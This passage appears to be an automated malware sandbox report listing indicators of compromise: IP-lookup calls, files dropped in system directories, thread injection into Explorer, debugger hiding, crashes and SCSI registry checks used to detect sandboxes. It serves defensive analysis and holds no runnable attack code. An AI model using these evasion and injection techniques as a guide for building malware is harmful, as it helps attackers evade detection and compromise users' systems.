\??\G: installer.exe File opened (read-only) \??\L: installer.exe File opened (read-only) \??\A: installer.exe File opened (read-only) \??\M: setting.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\Z: WerFault.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\I: installer.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\N: installer.exe File opened (read-only) \??\Q: setting.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\B: installer.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\O: installer.exe File opened (read-only) \??\J: setting.exe File opened (read-only) \??\X: installer.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\L: installer.exe File opened (read-only) \??\X: setting.exe File opened (read-only) \??\K: installer.exe File opened (read-only) \??\S: installer.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\H: installer.exe File opened (read-only) \??\V: installer.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\U: installer.exe File opened (read-only) \??\R: setting.exe File opened (read-only) \??\F: installer.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\M: installer.exe File opened (read-only) \??\G: setting.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\U: installer.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\I: installer.exe File opened (read-only) \??\F: setting.exe File opened (read-only) \??\W: msiexec.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 12 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 215 ipinfo.io 230 ipinfo.io 231 ipinfo.io 3558 ip-api.com 3 ipinfo.io 72 ipinfo.io 165 ipinfo.io 174 ipinfo.io 179 ip-api.com 37 ipinfo.io 45 ipinfo.io 46 ipinfo.io -
Drops file in System32 directory 20 IoCs
Processes:
DrvInst.exerundll32.exetapinstall.exedescription ioc process File opened for modification C:\Windows\System32\DriverStore\Temp\{14a5d0b8-e571-1f4e-b55d-de073fbb1b4a}\tap0901.cat DrvInst.exe File created C:\Windows\System32\DriverStore\Temp\{14a5d0b8-e571-1f4e-b55d-de073fbb1b4a}\SETE527.tmp DrvInst.exe File opened for modification C:\Windows\System32\DriverStore\FileRepository\oemvista.inf_amd64_a572b7f20c402d28\oemvista.inf DrvInst.exe File opened for modification C:\Windows\System32\DriverStore\Temp\{14a5d0b8-e571-1f4e-b55d-de073fbb1b4a}\SETE527.tmp DrvInst.exe File opened for modification C:\Windows\System32\GroupPolicy rundll32.exe File opened for modification C:\Windows\System32\GroupPolicy\gpt.ini rundll32.exe File created C:\Windows\System32\GroupPolicy\Machine\Registry.pol rundll32.exe File opened for modification C:\Windows\System32\DriverStore\Temp\{14a5d0b8-e571-1f4e-b55d-de073fbb1b4a}\oemvista.inf DrvInst.exe File opened for modification C:\Windows\System32\DriverStore\Temp\{14a5d0b8-e571-1f4e-b55d-de073fbb1b4a}\SETE515.tmp DrvInst.exe File opened for modification C:\Windows\System32\DriverStore\Temp\{14a5d0b8-e571-1f4e-b55d-de073fbb1b4a}\tap0901.sys DrvInst.exe File created C:\Windows\System32\DriverStore\FileRepository\oemvista.inf_amd64_a572b7f20c402d28\oemvista.PNF tapinstall.exe File created C:\Windows\System32\DriverStore\drvstore.tmp DrvInst.exe File opened for modification C:\Windows\System32\DriverStore\FileRepository\oemvista.inf_amd64_a572b7f20c402d28\tap0901.sys DrvInst.exe File opened for modification C:\Windows\System32\DriverStore\FileRepository\oemvista.inf_amd64_a572b7f20c402d28\tap0901.cat DrvInst.exe File opened for modification C:\Windows\System32\CatRoot2\dberr.txt DrvInst.exe File opened for modification C:\Windows\System32\GroupPolicy\GPT.INI rundll32.exe File created C:\Windows\System32\DriverStore\Temp\{14a5d0b8-e571-1f4e-b55d-de073fbb1b4a}\SETE515.tmp DrvInst.exe File opened for modification C:\Windows\System32\DriverStore\Temp\{14a5d0b8-e571-1f4e-b55d-de073fbb1b4a}\SETE526.tmp DrvInst.exe File created C:\Windows\System32\DriverStore\Temp\{14a5d0b8-e571-1f4e-b55d-de073fbb1b4a}\SETE526.tmp DrvInst.exe File opened for modification C:\Windows\System32\DriverStore\Temp\{14a5d0b8-e571-1f4e-b55d-de073fbb1b4a} DrvInst.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 25 IoCs
Processes:
238072.exe75X59NlosCHoajTjpeDlodY1.exeiYGd7u5Uk_Ib_3Gb94q_cYxs.exebwkxPh1yL2Wkm1rmvTMe2VTO.exe75X59NlosCHoajTjpeDlodY1.exe8326766.exeq2NUgOj7NxZeJYYXzRNGaWUt.exe3518046.exesihost64.exebeadroll.exemask_svc.exemask_svc.exemask_svc.exepid process 1692 238072.exe 5860 75X59NlosCHoajTjpeDlodY1.exe 5680 iYGd7u5Uk_Ib_3Gb94q_cYxs.exe 5656 bwkxPh1yL2Wkm1rmvTMe2VTO.exe 5848 75X59NlosCHoajTjpeDlodY1.exe 5556 8326766.exe 5820 q2NUgOj7NxZeJYYXzRNGaWUt.exe 6360 3518046.exe 6992 sihost64.exe 5968 beadroll.exe 5968 beadroll.exe 5968 beadroll.exe 5968 beadroll.exe 5968 beadroll.exe 5968 beadroll.exe 5968 beadroll.exe 5968 beadroll.exe 5968 beadroll.exe 5968 beadroll.exe 5968 beadroll.exe 5968 beadroll.exe 5968 beadroll.exe 5456 mask_svc.exe 7440 mask_svc.exe 2604 mask_svc.exe -
Suspicious use of SetThreadContext 17 IoCs
Processes:
Mon1727c156c4abcec.exeMon174a6c5f1664f.exeE_OHOPUQK1p49G7oDJQPE6PW.exeadF6KxjhcOfjYh4ost48IawU.exeFMTnjSf044j05Xl8dMd_dNnh.exeyOj1WECF7HJNMLcwMO9spdy6.exeXOi6C0Ymdh5PqNsTC3JWe2Yq.exehkAZQUdE7y720uA2jdtj5skU.exemsiexec.exe6F64.exe16A5.exebeadroll.exe4112.exe5D56.execonhost.exedescription pid process target process PID 3216 set thread context of 4832 3216 Mon1727c156c4abcec.exe Mon1727c156c4abcec.exe PID 1596 set thread context of 5164 1596 Mon174a6c5f1664f.exe Mon174a6c5f1664f.exe PID 6140 set thread context of 3196 6140 E_OHOPUQK1p49G7oDJQPE6PW.exe Explorer.EXE PID 6064 set thread context of 3196 6064 adF6KxjhcOfjYh4ost48IawU.exe Explorer.EXE PID 5796 set thread context of 2068 5796 FMTnjSf044j05Xl8dMd_dNnh.exe AppLaunch.exe PID 5660 set thread context of 6424 5660 yOj1WECF7HJNMLcwMO9spdy6.exe yOj1WECF7HJNMLcwMO9spdy6.exe PID 6140 set thread context of 3196 6140 E_OHOPUQK1p49G7oDJQPE6PW.exe Explorer.EXE PID 6040 set thread context of 6552 6040 XOi6C0Ymdh5PqNsTC3JWe2Yq.exe XOi6C0Ymdh5PqNsTC3JWe2Yq.exe PID 5812 set thread context of 2664 5812 hkAZQUdE7y720uA2jdtj5skU.exe XkYUSm_BYC_RZqlw0pSLKPVp.exe PID 1756 set thread context of 3196 1756 msiexec.exe Explorer.EXE PID 6776 set thread context of 6704 6776 6F64.exe 6F64.exe PID 2440 set thread context of 5912 2440 16A5.exe AppLaunch.exe PID 5968 set thread context of 6580 5968 beadroll.exe regsvcs.exe PID 4964 set thread context of 3116 4964 4112.exe 4112.exe PID 6784 set thread context of 4048 6784 5D56.exe 5D56.exe PID 2308 set thread context of 5644 2308 conhost.exe explorer.exe PID 1756 set thread context of 5644 1756 msiexec.exe explorer.exe -
Drops file in Program Files directory 64 IoCs
Processes:
autosubplayer.exelighteningplayer-cache-gen.exevpn.tmpautosubplayer.exedata_load.exejg1_1faf.exeDYbALA.exedata_load.exedescription ioc process File opened for modification C:\Program Files (x86)\lighteningplayer\lua\meta\art\00_musicbrainz.luac autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\lua\playlist\anevia_streams.luac autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\plugins.dat.7784 lighteningplayer-cache-gen.exe File created C:\Program Files (x86)\MaskVPN\is-H0SGC.tmp vpn.tmp File created C:\Program Files (x86)\lighteningplayer\lua\meta\art\00_musicbrainz.luac autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\control\libntservice_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\logger\libfile_logger_plugin.dll autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\lua\http\dialogs\stream_config_window.html autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\lua\http\requests\browse.xml autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\http\css\ui-lightness\images\ui-bg_gloss-wave_35_f6a828_500x100.png autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\playlist\vimeo.luac autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\audio_output\libwasapi_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\demux\libes_plugin.dll autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\lua\http\index.html autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\lua\intf\http.luac autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\lua\modules\sandbox.luac autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\plugins\access\libudp_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\http\css\ui-lightness\images\ui-bg_glass_65_ffffff_1x400.png autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\d3d11\libdirect3d11_filters_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\demux\libdemux_stl_plugin.dll autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\plugins\demux\libdemuxdump_plugin.dll autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\plugins\packetizer\libpacketizer_hevc_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\audio_output\libafile_plugin.dll autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\lua\http\mobile.html autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\plugins\misc\libgnutls_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\MaskVPN\driver\winxp64\is-0IFB8.tmp vpn.tmp File created C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\http\css\ui-lightness\images\ui-bg_highlight-soft_75_ffe45c_1x100.png autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\http\dialogs\stream_config_window.html autosubplayer.exe File opened for modification C:\Program Files\temp_files\cache.dat data_load.exe File created C:\Program Files (x86)\lighteningplayer\plugins\demux\libsubtitle_plugin.dll autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\plugins\packetizer\libpacketizer_mpegvideo_plugin.dll autosubplayer.exe File opened for modification C:\Program Files (x86)\Company\NewProduct\d jg1_1faf.exe File created C:\Program Files\Windows Defender\YUILRNYATQ\foldershare.exe DYbALA.exe File created C:\Program Files (x86)\lighteningplayer\plugins\demux\libreal_plugin.dll autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\plugins\packetizer\libpacketizer_mpeg4video_plugin.dll autosubplayer.exe File created C:\Program Files\temp_files\data.dll data_load.exe File created C:\Program Files (x86)\MaskVPN\is-5CEO9.tmp vpn.tmp File opened for modification C:\Program Files (x86)\lighteningplayer\plugins\access\libvdr_plugin.dll autosubplayer.exe File created C:\Program Files\temp_files\bckf.fon data_load.exe File created C:\Program Files (x86)\MaskVPN\driver\win732\is-MBG7O.tmp vpn.tmp File created C:\Program Files (x86)\lighteningplayer\lighteningplayer.ico autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\lua\playlist\dailymotion.luac autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\lua\playlist\jamendo.luac autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\http\mobile_view.html autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\plugins\demux\libmpgv_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\http\vlm_export.html autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\demux\libnsc_plugin.dll autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\lua\http\view.html autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\mux\libmux_asf_plugin.dll autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\plugins\demux\libpva_plugin.dll autosubplayer.exe File opened for modification C:\Program Files (x86)\MaskVPN\driver\winxp32\devcon.exe vpn.tmp File created C:\Program Files (x86)\lighteningplayer\plugins\packetizer\libpacketizer_mpeg4video_plugin.dll autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\plugins\mux\libmux_ps_plugin.dll autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\plugins\packetizer\libpacketizer_dts_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\access\libdvdnav_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\demux\libnoseek_plugin.dll autosubplayer.exe File opened for modification C:\Program Files (x86)\MaskVPN\driver\win732\tapinstall.exe vpn.tmp File opened for modification C:\Program Files (x86)\lighteningplayer\plugins\audio_output\libafile_plugin.dll autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\plugins\demux\libcaf_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\access\libtimecode_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\demux\libgme_plugin.dll autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\plugins\access\libsdp_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\http\requests\browse.xml autosubplayer.exe -
Drops file in Windows directory 58 IoCs
Processes:
msiexec.exeDrvInst.exemsiexec.exeDrvInst.exetapinstall.exeMsiExec.exeWerFault.exesvchost.exesvchost.exerundll32.exedescription ioc process File created C:\Windows\Installer\fb6bb65.msi msiexec.exe File opened for modification C:\Windows\INF\setupapi.dev.log DrvInst.exe File opened for modification C:\Windows\Installer\MSID85.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSIC009.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSIEFCD.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSIF6CB.tmp msiexec.exe File created C:\Windows\Installer\inprogressinstallinfo.ipi msiexec.exe File opened for modification C:\Windows\Installer\MSI8C1.tmp msiexec.exe File created C:\Windows\SystemTemp\~DF71FB6C359B7FE8BB.TMP msiexec.exe File opened for modification C:\Windows\Installer\MSIBBE2.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSIC1B0.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSIC81B.tmp msiexec.exe File created C:\Windows\inf\oem2.inf DrvInst.exe File opened for modification C:\Windows\INF\setupapi.dev.log tapinstall.exe File opened for modification C:\Windows\Installer\MSIE2C9.tmp msiexec.exe File created C:\Windows\SystemTemp\~DFB6C0E94BF782EC74.TMP msiexec.exe File created C:\Windows\SystemTemp\~DF55854300FD50CEC6.TMP msiexec.exe File opened for modification C:\Windows\Installer\MSIFF3A.tmp msiexec.exe File created C:\Windows\Installer\f787f73.msi msiexec.exe File opened for modification C:\Windows\Installer\MSIE701.tmp msiexec.exe File created C:\Windows\Installer\inprogressinstallinfo.ipi msiexec.exe File opened for modification C:\Windows\Installer\MSIEBC5.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI1C0F.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSICC9B.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSIB6E0.tmp msiexec.exe File created C:\Windows\Tasks\AdvancedWindowsManager #1.job MsiExec.exe File opened for modification C:\Windows\Installer\MSIFBFC.tmp msiexec.exe File created C:\Windows\AppCompat\Programs\Amcache.hve.tmp WerFault.exe File opened for modification C:\Windows\Installer\f787f73.msi msiexec.exe File created C:\Windows\SystemTemp\~DFE32DBCA61EA57E7A.TMP msiexec.exe File opened for modification C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log msiexec.exe File opened for modification C:\Windows\Installer\MSIEBFC.tmp msiexec.exe File created C:\Windows\SystemTemp\~DF7B23878A435BD970.TMP msiexec.exe File created C:\Windows\Installer\SourceHash{B59E6947-D960-4A88-902E-F387AFD7DF1F} msiexec.exe File opened for modification C:\Windows\Installer\MSIC4CE.tmp msiexec.exe File opened for modification C:\Windows\Tasks\SA.DAT svchost.exe File opened for modification C:\Windows\INF\setupapi.dev.log svchost.exe File opened for modification C:\Windows\Installer\MSI620.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI1594.tmp msiexec.exe File opened for modification C:\Windows\Installer\fb6bb65.msi msiexec.exe File opened for modification C:\Windows\INF\setupapi.dev.log DrvInst.exe File opened for modification C:\Windows\Installer\MSI96F3.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSIE0A5.tmp msiexec.exe File created C:\Windows\Installer\SourceHash{C845414C-903C-4218-9DE7-132AB97FDF62} msiexec.exe File opened for modification C:\Windows\Installer\MSID2A.tmp msiexec.exe File created C:\Windows\SystemTemp\~DF4CD235BD5E79E7CE.TMP msiexec.exe File created C:\Windows\Tasks\IuWtIecd.job rundll32.exe File opened for modification C:\Windows\Installer\MSIE3F3.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI1F3D.tmp msiexec.exe File opened for modification C:\Windows\inf\oem2.inf DrvInst.exe File opened for modification C:\Windows\Installer\MSIF062.tmp msiexec.exe File opened for modification C:\Windows\Installer\ msiexec.exe File opened for modification C:\Windows\Installer\MSI177A.tmp msiexec.exe File opened for modification C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log msiexec.exe File opened for modification C:\Windows\Installer\ msiexec.exe File created C:\Windows\SystemTemp\~DF9D4F20C5F930BD23.TMP msiexec.exe File opened for modification C:\Windows\Installer\MSI4740.tmp msiexec.exe File created C:\Windows\SystemTemp\~DFBB32E4917BB74D07.TMP msiexec.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 44 IoCs
Processes:
WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exepid pid_target process target process 6264 1240 WerFault.exe rundll32.exe 6800 4040 WerFault.exe Mon17870faab0.exe 6892 1240 WerFault.exe rundll32.exe 6676 5544 WerFault.exe chrome.exe 7000 5796 WerFault.exe FMTnjSf044j05Xl8dMd_dNnh.exe 7044 1460 WerFault.exe Mon17a0d8ec302e.exe 3576 6372 WerFault.exe chrome3.exe 1092 4856 WerFault.exe rundll32.exe 6932 5592 WerFault.exe AHF75qBjiaQYz2D8BbekPx7V.exe 5812 5148 WerFault.exe Soft1WW01.exe 4376 6032 WerFault.exe JmrC_y7ZqnosVrDZc7UTR80C.exe 4452 3412 WerFault.exe JmrC_y7ZqnosVrDZc7UTR80C.exe 1104 5708 WerFault.exe setup.exe 1240 5788 WerFault.exe f_qhca_mqGIJHx39G3hKWVKQ.exe 6208 1816 WerFault.exe 0fFanJEm3W2BLsRLXOPRYqYY.exe 5052 5592 WerFault.exe ABB3.exe 3708 4680 WerFault.exe neCuj2trzULeCoH07fFT9rBD.exe 132 5656 WerFault.exe bwkxPh1yL2Wkm1rmvTMe2VTO.exe 3984 6552 WerFault.exe XOi6C0Ymdh5PqNsTC3JWe2Yq.exe 5608 2664 WerFault.exe XkYUSm_BYC_RZqlw0pSLKPVp.exe 5168 1180 WerFault.exe rundll32.exe 3040 2440 WerFault.exe 16A5.exe 5244 7084 WerFault.exe 2DA8.exe 3024 5768 WerFault.exe UlBX2Ub5Zbv6MawSefADY4uU.exe 1320 5968 WerFault.exe beadroll.exe 5600 236 WerFault.exe rundll32.exe 2372 6192 WerFault.exe 71F8.exe 6484 5012 WerFault.exe UlBX2Ub5Zbv6MawSefADY4uU.exe 500 6964 WerFault.exe FFEF.exe 3580 4048 WerFault.exe 5D56.exe 7200 6152 WerFault.exe rundll32.exe 7336 10092 WerFault.exe GcleanerEU.exe 7528 6264 WerFault.exe gcleaner.exe 9372 6488 WerFault.exe tkools.exe 6764 5532 WerFault.exe GcleanerEU.exe 5840 10180 WerFault.exe rundll32.exe 10032 8384 WerFault.exe gcleaner.exe 6628 5492 WerFault.exe autosubplayer.exe 6148 6456 WerFault.exe GcleanerEU.exe 4868 8220 WerFault.exe rundll32.exe 10160 9096 WerFault.exe gcleaner.exe 8432 4896 WerFault.exe GcleanerEU.exe 1968 7116 WerFault.exe rundll32.exe 2084 6272 WerFault.exe gcleaner.exe -
Checks SCSI registry key(s) 3 TTPs 64 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
svchost.exesvchost.exeDrvInst.exetapinstall.exeDrvInst.exe6F64.exeyOj1WECF7HJNMLcwMO9spdy6.exetapinstall.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{80d81ea6-7473-4b0c-8216-efc11a2c4c8b}\0002 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{656a3bb3-ecc0-43fd-8477-4ae0404a96cd}\2006 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\004D svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0018 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0051 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\004C svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{80d81ea6-7473-4b0c-8216-efc11a2c4c8b}\0003 svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\ConfigFlags svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_SANU&PROD_SANU_DVD-ROM\4&135B206D&0&010000 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Filters DrvInst.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{3464f7a4-2444-40b1-980a-e0903cb6d912}\000A\ svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Capabilities svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{656a3bb3-ecc0-43fd-8477-4ae0404a96cd}\300A svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0018 svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\HardwareID tapinstall.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Phantom DrvInst.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0003 svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\DeviceDesc svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{88ad39db-0d0c-4a38-8435-4043826b5c91}\000A svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{656a3bb3-ecc0-43fd-8477-4ae0404a96cd}\2002 svchost.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 6F64.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\ConfigFlags svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Phantom DrvInst.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\HardwareID DrvInst.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI yOj1WECF7HJNMLcwMO9spdy6.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0054 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0018 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0064 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0008 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{80d81ea6-7473-4b0c-8216-efc11a2c4c8b}\0004 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{88ad39db-0d0c-4a38-8435-4043826b5c91}\0008 svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0004\ svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\ConfigFlags tapinstall.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Mfg svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009 svchost.exe Key opened 